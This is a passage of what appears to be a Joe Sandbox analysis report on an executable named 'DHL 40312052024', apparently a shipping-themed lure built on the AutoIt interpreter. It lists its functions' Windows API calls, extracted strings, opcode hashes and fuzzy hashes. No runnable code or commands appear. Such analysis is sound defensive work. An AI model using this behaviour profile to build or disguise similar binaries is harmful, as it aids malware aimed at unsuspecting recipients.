                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 311963372-3080491070
                                                                                    • Opcode ID: c287ff5fa8117e86bfe34283657ca72089c712c3bef0e962439d61fd40214d8c
                                                                                    • Instruction ID: 0a99138e670616be71944e844b49863f6503e97aa361d7d317cd197d142bd20a
                                                                                    • Opcode Fuzzy Hash: c287ff5fa8117e86bfe34283657ca72089c712c3bef0e962439d61fd40214d8c
                                                                                    • Instruction Fuzzy Hash: 61517171900509EACF18EBE0DD5AEEEB778FF14300F500565F509B21A2EB396E99CB61
                                                                                    Function 0081A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0081A3CB
                                                                                    • GetDriveTypeW.KERNEL32 ref: 0081A418
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0081A460
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0081A497
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0081A4C5
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                    • API String ID: 2698844021-4113822522
                                                                                    • Opcode ID: 75a934b75b113e24f79831dae96fa91d4017558cfc1f728ea7e064cd5eaacc9d
                                                                                    • Instruction ID: 0817168aca3b754338961649034edcc4bfe211bf55eeb270a4723f8d20da72f0
                                                                                    • Opcode Fuzzy Hash: 75a934b75b113e24f79831dae96fa91d4017558cfc1f728ea7e064cd5eaacc9d
                                                                                    • Instruction Fuzzy Hash: E9514B71104305DFC704EF20C895AAAB7F8FF94718F00896DF89A972A1DB35AD09CB92
                                                                                    Function 0080F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,007EE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0080F8DF
                                                                                    • LoadStringW.USER32(00000000,?,007EE029,00000001), ref: 0080F8E8
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00875310,?,00000FFF,?,?,007EE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0080F90A
                                                                                    • LoadStringW.USER32(00000000,?,007EE029,00000001), ref: 0080F90D
                                                                                    • __swprintf.LIBCMT ref: 0080F95D
                                                                                    • __swprintf.LIBCMT ref: 0080F96E
                                                                                    • _wprintf.LIBCMT ref: 0080FA17
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0080FA2E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                    • API String ID: 984253442-2268648507
                                                                                    • Opcode ID: ef6211b993df91972901e91cfe94d3f87ff93ee2838deaf9694506f90d297a4c
                                                                                    • Instruction ID: 850961f586a665a350d7db16b73851796c9ee0c8d520e48ec346cd68e5829dba
                                                                                    • Opcode Fuzzy Hash: ef6211b993df91972901e91cfe94d3f87ff93ee2838deaf9694506f90d297a4c
                                                                                    • Instruction Fuzzy Hash: 76414E72904219EACF18FBE0DD8AEEE7778EF54300F500465F605B2192EA396F49CB61
                                                                                    Function 0083BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00839207,?,?), ref: 0083BA56
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00839207,?,?,00000000,?), ref: 0083BA6D
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00839207,?,?,00000000,?), ref: 0083BA78
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00839207,?,?,00000000,?), ref: 0083BA85
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0083BA8E
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00839207,?,?,00000000,?), ref: 0083BA9D
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0083BAA6
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00839207,?,?,00000000,?), ref: 0083BAAD
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00839207,?,?,00000000,?), ref: 0083BABE
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00842CAC,?), ref: 0083BAD7
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0083BAE7
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0083BB0B
                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0083BB36
                                                                                    • DeleteObject.GDI32(00000000), ref: 0083BB5E
                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0083BB74
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 3840717409-0
                                                                                    • Opcode ID: 8dbecf5922de0c440a8cf14ef4216445deb3c8f68638d51f90165e27c42638b9
                                                                                    • Instruction ID: f363026e45776c91ccb6afb2437948b61628be0bf3938646dfd98cfc1c8a99c3
                                                                                    • Opcode Fuzzy Hash: 8dbecf5922de0c440a8cf14ef4216445deb3c8f68638d51f90165e27c42638b9
                                                                                    • Instruction Fuzzy Hash: A8413A75A00208EFDB119F65DC88EABBBB8FFC9711F104468FA09D7261D7309A01CBA0
                                                                                    Function 0081D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __wsplitpath.LIBCMT ref: 0081DA10
                                                                                    • _wcscat.LIBCMT ref: 0081DA28
                                                                                    • _wcscat.LIBCMT ref: 0081DA3A
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0081DA4F
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081DA63
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0081DA7B
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0081DA95
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081DAA7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                    • String ID: *.*
                                                                                    • API String ID: 34673085-438819550
                                                                                    • Opcode ID: ee38ecdd1b50284ff0c801765da812a8de10cb1a35d59eed57c8620cabb3644c
                                                                                    • Instruction ID: 0119439de81b9be7ef4b5c91f50cdf8bbcdb400e584b6ca120f9dd62f4fa1bbf
                                                                                    • Opcode Fuzzy Hash: ee38ecdd1b50284ff0c801765da812a8de10cb1a35d59eed57c8620cabb3644c
                                                                                    • Instruction Fuzzy Hash: EA8171B15043459FCB24DF64C844BEABBE8FF89314F14892EF989C7251D634E985CB52
                                                                                    Function 0083C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0083C1FC
                                                                                    • GetFocus.USER32 ref: 0083C20C
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0083C217
                                                                                    • _memset.LIBCMT ref: 0083C342
                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0083C36D
                                                                                    • GetMenuItemCount.USER32(?), ref: 0083C38D
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0083C3A0
                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0083C3D4
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0083C41C
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0083C454
                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0083C489
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1296962147-4108050209
                                                                                    • Opcode ID: 5f3f32b92430197dd2a37faa0f149246fa4f0f00d2ec5114d122ce8084ab91af
                                                                                    • Instruction ID: bcb54f02eafb8fa7032bd9d8897e6a764736db85f5dc4edbbf417e729d7623e3
                                                                                    • Opcode Fuzzy Hash: 5f3f32b92430197dd2a37faa0f149246fa4f0f00d2ec5114d122ce8084ab91af
                                                                                    • Instruction Fuzzy Hash: B1815A71608311AFDB14DF24C894A6BBBE8FBC8714F00492EFA95E7291D771D905CBA2
                                                                                    Function 0082731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0082738F
                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0082739B
                                                                                    • CreateCompatibleDC.GDI32(?), ref: 008273A7
                                                                                    • SelectObject.GDI32(00000000,?), ref: 008273B4
                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00827408
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00827444
                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00827468
                                                                                    • SelectObject.GDI32(00000006,?), ref: 00827470
                                                                                    • DeleteObject.GDI32(?), ref: 00827479
                                                                                    • DeleteDC.GDI32(00000006), ref: 00827480
                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0082748B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                    • String ID: (
                                                                                    • API String ID: 2598888154-3887548279
                                                                                    • Opcode ID: 4e942fd4963e3385f3704b7a9b0e2e5b938482d7a1e61d7b4f361976190efca7
                                                                                    • Instruction ID: 76c4280fc3597d8d166a93f9622adddd549c493e92fe6154aa9d24a189c438b5
                                                                                    • Opcode Fuzzy Hash: 4e942fd4963e3385f3704b7a9b0e2e5b938482d7a1e61d7b4f361976190efca7
                                                                                    • Instruction Fuzzy Hash: 34513871904619EFCB14CFA9DC89EAEBBB9FF88310F14842DEA5997211D731A9408B90
                                                                                    Function 007B6A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007D0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,007B6B0C,?,00008000), ref: 007D0973
                                                                                      • Part of subcall function 007B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B4743,?,?,007B37AE,?), ref: 007B4770
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007B6BAD
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007B6CFA
                                                                                      • Part of subcall function 007B586D: _wcscpy.LIBCMT ref: 007B58A5
                                                                                      • Part of subcall function 007D363D: _iswctype.LIBCMT ref: 007D3645
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                    • API String ID: 537147316-1018226102
                                                                                    • Opcode ID: c463eb1290372fd7ce17d5b4a760b166eabdb041824d5eb0937db87182704f01
                                                                                    • Instruction ID: 72c42d8357b43631fb4e24ecb425220c786f7de9003c2de2e92d47511b5a144b
                                                                                    • Opcode Fuzzy Hash: c463eb1290372fd7ce17d5b4a760b166eabdb041824d5eb0937db87182704f01
                                                                                    • Instruction Fuzzy Hash: D6026770108380DFC724EF24C885AAFBBE5BF99314F14491DF599972A2DB38E949CB52
                                                                                    Function 00812D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00812D50
                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00812DDD
                                                                                    • GetMenuItemCount.USER32(00875890), ref: 00812E66
                                                                                    • DeleteMenu.USER32(00875890,00000005,00000000,000000F5,?,?), ref: 00812EF6
                                                                                    • DeleteMenu.USER32(00875890,00000004,00000000), ref: 00812EFE
                                                                                    • DeleteMenu.USER32(00875890,00000006,00000000), ref: 00812F06
                                                                                    • DeleteMenu.USER32(00875890,00000003,00000000), ref: 00812F0E
                                                                                    • GetMenuItemCount.USER32(00875890), ref: 00812F16
                                                                                    • SetMenuItemInfoW.USER32(00875890,00000004,00000000,00000030), ref: 00812F4C
                                                                                    • GetCursorPos.USER32(?), ref: 00812F56
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00812F5F
                                                                                    • TrackPopupMenuEx.USER32(00875890,00000000,?,00000000,00000000,00000000), ref: 00812F72
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00812F7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3993528054-0
                                                                                    • Opcode ID: 1855e4c52ddbcbf095f3b919c61d30ff5c7bb3659955fa4a7d7e3e8c7aa12d49
                                                                                    • Instruction ID: 00cbbb9c8b6d75c2d53f7de0616a59a40b463a213bf1732c8e34e15e1b454450
                                                                                    • Opcode Fuzzy Hash: 1855e4c52ddbcbf095f3b919c61d30ff5c7bb3659955fa4a7d7e3e8c7aa12d49
                                                                                    • Instruction Fuzzy Hash: 6B71C270640209BBEB219F54DC85FEABF68FF44764F100216F619E61E2C7B168B0D795
                                                                                    Function 008077DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    • _memset.LIBCMT ref: 0080786B
                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008078A0
                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008078BC
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008078D8
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00807902
                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0080792A
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00807935
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0080793A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                    • API String ID: 1411258926-22481851
                                                                                    • Opcode ID: 12ee85be9c991d67e54055d06b37352cd0bb09c2c4a89e877742785d8efba204
                                                                                    • Instruction ID: 015e21c42ae131a38af8a3d101bb332749e894dd68eeb6f932c42558a65c757a
                                                                                    • Opcode Fuzzy Hash: 12ee85be9c991d67e54055d06b37352cd0bb09c2c4a89e877742785d8efba204
                                                                                    • Instruction Fuzzy Hash: 8A410872C14629EACF15EBA4DC99EEEB778FF44310F444429E915A32A1DB34AD04CBA0
                                                                                    Function 00830E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0082FDAD,?,?), ref: 00830E31
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharUpper
                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                    • API String ID: 3964851224-909552448
                                                                                    • Opcode ID: 75ce8f017b32ce1b62b0c1506f7f8657dbba0f50bc8e465e41da75f1e59bea88
                                                                                    • Instruction ID: 712a02a39892682cfc9edf867e65dc53e24ff1b20682ccb84b53322434ca9b80
                                                                                    • Opcode Fuzzy Hash: 75ce8f017b32ce1b62b0c1506f7f8657dbba0f50bc8e465e41da75f1e59bea88
                                                                                    • Instruction Fuzzy Hash: C741253220024ACBCF10EF50D86AAEE3768FF91344F154455FD959B2D2DB38A95ACBE0
                                                                                    Function 0080F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007EE2A0,00000010,?,Bad directive syntax error,0083F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0080F7C2
                                                                                    • LoadStringW.USER32(00000000,?,007EE2A0,00000010), ref: 0080F7C9
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                    • _wprintf.LIBCMT ref: 0080F7FC
                                                                                    • __swprintf.LIBCMT ref: 0080F81E
                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0080F88D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                    • API String ID: 1506413516-4153970271
                                                                                    • Opcode ID: 266bb43f63b204ab81d31117d5173b616be4bfcf1eda0c1b547cd995eea0ed30
                                                                                    • Instruction ID: 191051a0e461dfd0ad660b3f4a98a219b9cd101eac447d236aecba8491560d6a
                                                                                    • Opcode Fuzzy Hash: 266bb43f63b204ab81d31117d5173b616be4bfcf1eda0c1b547cd995eea0ed30
                                                                                    • Instruction Fuzzy Hash: 6A21713290021EEBCF15EF90CC5AFED7739FF18300F044866F515A61A2EA75A618DB61
                                                                                    Function 008152C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                      • Part of subcall function 007B7924: _memmove.LIBCMT ref: 007B79AD
                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00815330
                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00815346
